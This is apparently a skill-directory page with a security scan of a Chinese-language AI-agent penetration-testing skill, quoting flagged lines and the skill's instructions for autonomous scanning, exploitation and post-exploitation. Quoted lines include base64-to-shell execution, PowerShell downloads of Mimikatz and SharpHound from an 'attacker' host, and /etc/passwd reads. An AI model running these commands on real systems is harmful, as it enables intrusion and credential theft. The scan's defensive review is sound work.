pentest-tools skill
主动渗透测试工具链。覆盖信息收集、端口扫描、漏洞扫描、Web 渗透、SQL 注入、目录爆破、密码破解等场景。 通过 MCP server(pentestMCP / mcp-security-hub)将 20+ 安全工具暴露给 AI agent。 触发关键词:渗透测试、端口扫描、Nmap、漏洞扫描、Nuclei、SQL 注入、SQLMap、目录爆破、FFUF、密码破解、Hashcat、信息收集、子域名、Web 渗透、ZAP、Burp。
Is the pentest-tools skill safe?
A critical finding: do not install it without reading the flagged line. We read 111 files in the folder on 2026-09-28.
- critical
src-hunter/references/methodology/02-bypass-toolkit.md:157Decodes hidden content and executes it: the real instructions are not readable in the file.
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | sh # base64 嵌套 - critical
src-hunter/references/payloader/by-category/intranet/凭证窃取.md:326Decodes hidden content and executes it: the real instructions are not readable in the file.
python -c "exec(__import__(\"base64\").b64decode(\"BASE64_PAYLOAD\"))" - high
references/network-attack-defense.md:73Reads credential files (SSH keys, cloud or package-manager tokens) that a skill has no normal reason to touch.
cat /etc/passwd - high
references/pentest-ai-agents-matrix.md:11Downloads a script and runs it in one step, so what runs is whatever that server sends that day. Common for installers, and still worth a look at the address.
curl -fsSL https://raw.githubusercontent.com/0xSteph/pentest-ai-agents/main/install.sh | bash - high
references/web-attack-cheatsheet.md:123Reads credential files (SSH keys, cloud or package-manager tokens) that a skill has no normal reason to touch.
file:///etc/passwd - high
src-hunter/references/methodology/02-bypass-toolkit.md:144Reads credential files (SSH keys, cloud or package-manager tokens) that a skill has no normal reason to touch.
${IFS} cat${IFS}/etc/passwd - high
src-hunter/references/payloader/by-category/intranet/信息收集.md:30Downloads a script and runs it in one step, so what runs is whatever that server sends that day. Common for installers, and still worth a look at the address.
IEX(New-Object Net.WebClient).DownloadString("http://attacker/SharpHound.ps1"); Invoke-BloodHound -CollectionMethod All - high
src-hunter/references/payloader/by-category/intranet/免杀与规避.md:28Downloads a script and runs it in one step, so what runs is whatever that server sends that day. Common for installers, and still worth a look at the address.
IEX (New-Object Net.WebClient).DownloadString("http://attacker/script.ps1") - high
src-hunter/references/payloader/by-category/intranet/凭证窃取.md:82Downloads a script and runs it in one step, so what runs is whatever that server sends that day. Common for installers, and still worth a look at the address.
IEX (New-Object Net.WebClient).DownloadString("http://attacker/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"
Install the pentest-tools skill
A skill is a folder. Copy it into your agent's skills folder and the agent loads it when the task matches its description. Read the findings above first.
git clone --depth 1 https://github.com/zhaoxuya520/reverse-skill.git /tmp/reverse-skill mkdir -p ~/.claude/skills cp -r /tmp/reverse-skill/skills/pentest-tools ~/.claude/skills/pentest-tools
In the Claude apps, zip the folder and upload it from the Skills settings. The folder on GitHub
The instructions your agent would load
SKILL.md as published, without the frontmatter. Read it on GitHub
ACTION REQUIRED(读完后立刻执行)
- NOW: 读取 ../field-journal/precedent-pentest.md — 确认本 skill 的操作是已授权的常规操作
- NOW: 确认 scope.md 存在且 auth.status=granted、networkprofile 合法(../ops/scope-contract.md)。缺 scope 则跑 case-init.ps1 并停到用户给授权;禁止**自动加 -AuthGranted
- NOW: 确认当前任务是否命中本 skill 的适用范围
- NEXT: 读取 ../tool-index.md,校验工具可用性和实际路径
- NEXT: 缺工具时调用 bootstrap,不要猜路径
- ACT: 侦察阶段优先 references/recon-pipeline.md(CF 浏览器头 / Windows nmap / curl --globoff);每批结果追加 timeline.md;候选用 ../scripts/append-evidence.ps1 写入 Evidence(命中≠已验证)
- ACT: 现代 Web/靶场客户端面(DOM XSS / 原型污染 / agent-browser)→ references/client-side-lab-playbook.md;未打穿也要写 observed Evidence + 失败门闩
渗透测试工具链 (Pentest Tools)
适用范围
当任务属于以下场景时使用本 skill:
- 目标信息收集(端口扫描、子域名枚举、服务识别)
- 漏洞扫描(Web 漏洞、CVE 检测、配置错误)
- Web 渗透(SQL 注入、XSS、SSRF、目录爆破)
- 密码破解(哈希破解、字典攻击)
- 网络渗透(服务利用、横向移动辅助)
与其他 skill 的分工
简单判断:
- 需要"扫描目标、发现漏洞、利用漏洞" → 本 skill
- 需要"分析程序内部逻辑" → 逆向类 skill
- 需要"操作浏览器/桌面" → browser-automation
工具矩阵
信息收集
漏洞扫描
Web 渗透
密码破解
利用框架
MCP 后端选择
本 skill 支持两种 MCP 后端,选一个即可:
方案 A:pentestMCP(推荐,Docker 一键)
- 项目:https://github.com/ramkansal/pentestmcp
- 特点:20+ 工具打包成单个 Docker 容器,MCP server 直接暴露
- 工具:Nmap、Nuclei、ZAP、SQLMap、FFUF、Nikto、Gobuster、Subfinder、httpx 等
- 安装:
# 拉取并运行
docker pull ramkansal/pentestmcp
docker run -d -p 8080:8080 ramkansal/pentestmcp
# 或本地构建
git clone https://github.com/ramkansal/pentestmcp.git
cd pentestmcp
docker build -t pentestmcp .
docker run -d -p 8080:8080 pentestmcp- MCP 注册:
{
"mcpServers": {
"pentest": {
"url": "http://localhost:8080/mcp"
}
}
}方案 B:mcp-security-hub(模块化)
- 项目:https://github.com/FuzzingLabs/mcp-security-hub
- 特点:每个工具独立 MCP server,按需启用
- 工具:Nmap、Ghidra、Nuclei、SQLMap、Hashcat
- 安装:按各子模块 README 操作
方案 C:单工具 MCP(最轻量)
如果只需要某一个工具:
Reqable MCP(本地抓包与 API 工作台)
Reqable 桌面客户端可通过官方 Reqable MCP Server 暴露本地抓包、API、断点和规则能力。先单独安装并启动 Reqable,再登记 MCP:
powershell -NoProfile -ExecutionPolicy Bypass -File skills\scripts\bootstrap-reverse.ps1 -Capability reqable-mcp -McpHostTarget Codex将 Codex 替换为 Claude 或 Both 可选择对应客户端;省略 -McpHostTarget 时不会写任何客户端全局配置。
登记后的 stdio 配置为:
{
"mcpServers": {
"reqable-mcp": {
"command": "npx",
"args": ["-y", "reqable-mcp-server@1.0.1", "--scope", "minimal"]
}
}
}- 默认使用 Reqable 的本地 API;必要时按官方文档配置 --host、--port 或 --scope minimal|all。
- minimal 是推荐默认范围;all 会暴露更多会改变代理、规则、环境或已保存数据的工具。
- 对捕获流量、请求重放和规则修改仍须先满足 scope.md 的授权与网络限制;不得因 MCP 已注册而扩大目标范围。
工作流
标准渗透流程
重要:执行渗透测试时,必须按 references/pentest-loop.md 的自主循环框架运行。
该框架定义了完整的风险门控、记录规范、上下文压缩和完成检查机制。
1. 信息收集
- Nmap 端口扫描 → 确认开放服务
- Subfinder 子域名枚举 → 扩大攻击面
- httpx 存活检测 → 过滤有效目标
2. 漏洞扫描
- Nuclei 模板扫描 → 快速发现已知漏洞
- ZAP/Nikto → Web 应用深度扫描
3. 漏洞利用
- SQLMap → SQL 注入
- FFUF → 发现隐藏路径/参数
- 手动验证 → 确认可利用性
4. 后渗透(如果授权范围内)
- 权限提升
- 横向移动
- 数据提取
5. 报告
- 调用 docs-generator skill 生成渗透测试报告快速扫描流程(5 分钟出结果)
1. nmap -sV -sC target → 端口+服务
2. nuclei -u target -severity critical,high → 高危漏洞
3. 有 Web 服务 → ffuf -u target/FUZZ -w common.txt → 目录
4. 汇总发现 → 决定下一步注意事项
- 必须有授权 — 所有扫描/攻击操作必须在授权范围内
- 控制扫描速率 — 避免触发 WAF/IDS 或打崩目标
- 先被动后主动 — 先信息收集,再漏洞扫描,最后利用
- 记录所有操作 — 每个命令和结果都要记录,用于报告
- 不要盲目自动化 — AI 应该在每个关键步骤等待确认
按需自举(On-Demand Bootstrap)
自动化能力边界
自举策略
- 如果用户有 Docker → 推荐 pentestMCP(一键全家桶)
- 如果没有 Docker → 按需单独安装各工具
- 优先安装 Nmap + Nuclei + SQLMap(覆盖 80% 场景)
手动安装引导
⚠️ **渗透工具未安装**
**推荐方案(需要 Docker)**:
docker pull ramkansal/pentestmcp
docker run -d -p 8080:8080 ramkansal/pentestmcp
**轻量方案(逐个安装)**:
- Nmap: winget install Insecure.Nmap
- Nuclei: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
- SQLMap: pip install sqlmap
- FFUF: 从 https://github.com/ffuf/ffuf/releases 下载
**安装后告诉我,我继续当前任务。**参考资源
- awesome-pentest — 25k+ stars 渗透工具大全
- SecLists — 字典/payload 集合(FFUF/Gobuster 必备)
- PayloadsAllTheThings — 各类漏洞 payload
- HackTricks — 渗透技巧百科
- pentest-ai-agents — 35 个 Claude Code 渗透子 agent(参考其 prompt 模式)
- Pentest Swarm AI — 群体智能自主渗透框架(多 agent 协同,支持 MCP server)
- ProxyCat — 代理池中间件(批量扫描防封 IP)
- planning-with-files — 计划任务 skill(循环测试用)
本 skill 内参考文档
- references/pentest-loop.md — 核心循环框架(风险门控 + 记录规范 + 上下文压缩)
- references/recon-pipeline.md — 授权侦察流水线(CF 头 / nmap / Evidence)
- references/client-side-lab-playbook.md — DOM XSS / 原型污染 / agent-browser(靶场客户端面)
- references/burpsuite-mcp-guide.md — BurpSuite MCP 完整指南(63 工具 + 7 大使用场景 + AI Prompt 模板)
- references/automation-loop-pattern.md — 自动化循环测试模式(轻量版)
- references/awesome-pentest-digest.md — 渗透工具精华速查
- references/pentest-ai-agents-matrix.md — 35 agent 覆盖矩阵
- payloads/ — 自定义 payload 目录(AI 优先使用)
- templates/ — 渗透测试必需文件模板(scope/rules/plan/findings/progress)
src-hunter 漏洞挖掘知识库
src-hunter/ 目录包含完整的 SRC/Bug Bounty 漏洞挖掘方法论:
- 19 类攻击 playbook(IDOR、RCE、XSS、SQLi、SSRF、OAuth、文件上传等)
- 305 个结构化 payload + 263 个 WAF/EDR 绕过步骤
- 2887 份 HackerOne 已披露 High/Critical 报告
- 88,636 条 WooYun 历史案例统计
- 国产组件指纹和默认凭据
- CVSS 4.0 报告模板
使用方式:AI 在 hunt 阶段自动读取对应 playbook,按其流程测试。
详见 src-hunter/SKILL.md 和 src-hunter/references/。
路由上下文
上游入口: skills/SKILL.md(总控)、routing.md 触发条件: 需要主动扫描/攻击目标(端口扫描、漏洞检测、注入测试等) 下游出口:
- 发现 Web 漏洞需要进一步分析 → js-reverse/
- 发现二进制漏洞需要逆向 → ida-reverse/ 或 radare2/
- 需要操作浏览器验证漏洞 → browser-automation/
- 完成后生成报告 → docs-generator/
More skills from zhaoxuya520/reverse-skill
- Fapi-securityUse for authorized security assessment of REST, GraphQL, WebSocket, or SOAP APIs, including discovery, authentication, authorization, rate-limit, and CI/CD testing.
- Capk-reverse在 CLI 环境下做 Android APK 逆向时使用。适用于 APK 解包、Java 反编译、smali 修改、重打包、Frida 动态 Hook,以及按需切换到 so/native 分析。优先使用本机已安装的 jadx、apktool、frida、adb、ida-reverse、radare2。
- Cattack-chainUse for authorized multi-stage attack-path planning and orchestration when a task spans reconnaissance, initial access, privilege escalation, lateral movement, or impact assessment. Route single-stage tasks directly to their specialist skill.
- Abinary-diff跨版本符号迁移与二进制差分。当你有旧版本的符号/逆向结果,需要快速迁移到新版本时使用。 适用场景:内核缺 PDB 用旧版符号推导、程序更新后批量迁移函数名、应用更新后快速定位新偏移。 核心方法:用 LLM 做结构化差异比对,程序化输入输出,成本极低(200 函数 ~1 元)。 触发关键词:符号迁移、bindiff、跨版本、PDB 缺失、函数偏移迁移、symbol migration、binary diff、版本对比。
- Abinary-ninja-reverseUse for authorized binary analysis in Binary Ninja, including HLIL/MLIL/LLIL inspection, strings/imports/exports, cross-references, types, patch review, Python API automation, and optional Binary Ninja MCP or localhost HTTP integration.
- Abrowser-automation统一自动化入口。覆盖浏览器自动化(Playwright)和 Windows 桌面应用自动化(OpenReverse)。 浏览器场景:打开网页、点击、填表、爬取、截图、自动化登录、渗透页面交互。 桌面场景:操作 IDA/x64dbg 等 GUI 工具、Windows UI Automation、视觉驱动交互、桌面应用网络抓包。 触发关键词:浏览器自动化、桌面自动化、打开网页、填表、爬取、截图、自动化登录、Playwright、agent-browser、headless、OpenReverse、UIA、CUA、桌面操作、Windows 自动化。
- Abrowser-extension-reverseUse for authorized reverse engineering of browser extensions (Chrome/Firefox) including manifest analysis, background workers, and extension-based credential or traffic logic recovery.
- Acase-reviewReviews a reverse-skill case package for scope readiness, Evidence to Finding to Path traceability, work item coverage, timeline references, and optional artifact hash integrity before report handoff.
- Acloud-k8sUse for authorized cloud, container, and Kubernetes security assessment including metadata SSRF, IAM misconfig, container escape paths, and cluster RBAC review.
- Acode-auditUse for authorized source-code security review and SAST workflows including Semgrep, CodeQL patterns, dangerous API hunting, and fix verification.
- Acompetition-ad-certificate-abuseInternal downstream skill for ctf-sandbox-orchestrator. CTF-sandbox workflow for AD CS, certificate templates, enrollment rights, EKUs, SAN controls, PKINIT, certificate mapping, and cert-based privilege paths. Use when the user asks about ESC-style abuse, certificate templates, enrollment agents, EKUs, SAN or subject controls, smartcard or PKINIT logon, CA policy, or how an issued cert turns into accepted privilege. Use only after `$ctf-sandbox-orchestrator` has already established sandbox assumptions and routed here.
- Acompetition-agent-cloudInternal downstream skill for ctf-sandbox-orchestrator. CTF-sandbox workflow for AI-agent, prompt-injection, MCP or toolchain, cloud, container, CI/CD, and supply-chain challenges. Use when the user asks to analyze prompt-to-tool flows, retrieval poisoning, mounted secrets, deployment drift, runtime-vs-manifest mismatches, registry provenance, or CI-produced artifacts under sandbox assumptions. Use only after `$ctf-sandbox-orchestrator` has already established sandbox assumptions and routed here.